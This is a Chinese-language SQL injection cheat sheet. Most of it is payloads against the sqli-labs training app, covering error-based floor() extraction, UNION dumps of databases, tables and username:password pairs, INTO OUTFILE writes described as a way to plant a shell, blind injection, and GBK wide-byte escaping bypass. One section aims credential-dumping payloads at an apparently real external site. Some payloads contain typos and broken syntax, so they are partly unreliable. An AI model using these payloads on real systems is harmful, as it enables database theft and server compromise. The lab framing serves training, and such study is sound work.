Web安全之:SQL注入
條件 使用者可以接觸並修改傳送到伺服器的內容 URL判斷 and 1=1 and 1=2 依據返回資訊判斷 整形 ’ 同上 字元型判斷 -1 / +1 回顯上個頁面 整形 and sleep(12) 返回時間
原理 型別與手法 判斷方法
以下均為完美條件下。。。 報錯 floor floor方法
mysql> select concat(select database()); mysql> select concat(select database(),0x3a); mysql> select concat(select database(),0x3a,floor(rand()*2)); mysql> select concat(select database(),0x3a,floor(rand()*2)) a; mysql> select concat(select database(),0x3a,floor(rand()*2)) a from information_schema; mysql> select concat(select database(),0x3a,floor(rand()*2)) a from information_schema.tables; mysql> select concat(select database(),0x3a,floor(rand()*2)) a from information_schema.tables group by a; mysql> select conut(*),concat(select database(),0x3a,floor(rand()*2)) a from information_schema.tables group by a; ERROR 1062 (23000): Duplicate entry ‘:security:1’ for key ‘group_key’
依據語句返回錯誤判斷資料庫、使用者、版本、主機型別等資訊 獲取資料庫個數:
http://127.0.0.1/ctf/sqli-labs/Less-5/index.php ?id=1’+and(select 1 from(select count(*),concat((select (select (select concat(0x7e7e3a7e7e, count(distinct+table_schema),0x7e7e3a7e7e) from information_schema.tables)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+
資料庫: http://127.0.0.1/ctf/sqli-labs/Less-5/index.php ?id=-1’ UNION SELECT 1,count(*),concat(0x3a,(select database()),0x3a,floor (rand()*2)) a from information_schema.tables group by a– +
查表:
http://127.0.0.1/ctf/sqli-labs/Less-5/index.php ?id=-1’ UNION SELECT 1,count(*),concat((select table_name from information_schema.tables where table_schema=’security’ limit 1,1),0x3a,floor (rand()*2)) a from information_schema.tables group by a– +
欄位:
http://127.0.0.1/ctf/sqli-labs/Less-5/index.php ?id=-1’ UNION SELECT 1,count(*),concat((select column_name from information_schema.columns where table_name=’users’ limit 2,1),0x3a,floor (rand()*2)) a from information_schema.tables group by a– +
資料:
http://127.0.0.1/ctf/sqli-labs/Less-5/index.php ?id=-1’ UNION SELECT 1,count(*),concat((select concat_ws(0x3a,username,password) from users limit 1,1),0x3a,floor (rand()*2)) a from information_schema.tables group by a– +
ps:修改limit的值可實現查詢不同使用者或表名等 在MySQL 5.x版本
可採用檔案匯出方式(當前MySQL使用者擁有檔案操作許可權) 資料庫:
http://127.0.0.1/ctf/sqli-labs/Less-7/index.php ?id=1’)) UNION SELECT 1,database(),3 into outfile “D:/Wamp/www/ctf/sqli-labs/Less-7/tests.txt” –+
也是寫入shell的方式,匯出檔案不支援覆蓋 可將查詢一次性匯出
盲注 適合MySQL 5.x以下及一些禁報錯的語句 判斷版本:
資料庫:
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php ?id=1’ and (select length(table_name)> from information_schema.tables where table_schema=database() limit 0,1) –+ #true http://127.0.0.1/ctf/sqli-labs/Less-8/index.php ?id=1’ and (select length(table_name)>7 from information_schema.tables where table_schema=database() limit 0,1) –+ #false http://127.0.0.1/ctf/sqli-labs/Less-8/index.php ?id=1’ and (select length(table_name)=6 from information_schema.tables where table_schema=database() limit 0,1) –+ #true 第一個表長度為6 http://127.0.0.1/ctf/sqli-labs/Less-8/index.php ?id=1’ and asii(select table_name from information_schema.tables where table_schema=database() limit 0,1)=65 –+ # ascii(e)=65 修改limit值依次測試表名 http://127.0.0.1/ctf/sqli-labs/Less-8/index.php ?id=1’ and (select length(column_name)>4 from information_schema.columns where table_name limit 0,1) –+
重複操作欄位猜測
http://gaoneng.com/hz.php?id=37 and 1=2 union select 1,2,(select group_concat(schema_name)from information_schema.schemata),…,x 爆資料庫
http://gaoneng.com/hz.php?id=37 and 1=2 union select 1,2,(select group_concat(table_name)from information_schema.tables where schema_name=’資料庫名字’),…,x 爆表
http://gaoneng.com/hz.php?id=37 and 1=2 union select 1,2,(select group_concat(column_name)from information_schema.columns where table_name=’表名’),…,x 爆欄位
http://gaoneng.com/hz.php?id=37 and 1=2 union select 1,2,(select group_concat(user,pass)from 表名 ),…,x 報資料
寬位元組注入 條件 gbk編碼 sql注入中的寬位元組國內最常使用的gbk編碼,這種方式主要是繞過addslashes等對特殊字元進行轉移的繞過。反斜槓\的十六進位制為%5c,在你輸入%bf%27時,函式遇到單引號自動轉移加入\,此時變為%bf%5c%27,%bf%5c在gbk中變為一個寬字元“縗”。%bf那個位置可以是%81-%fe中間的任何字元。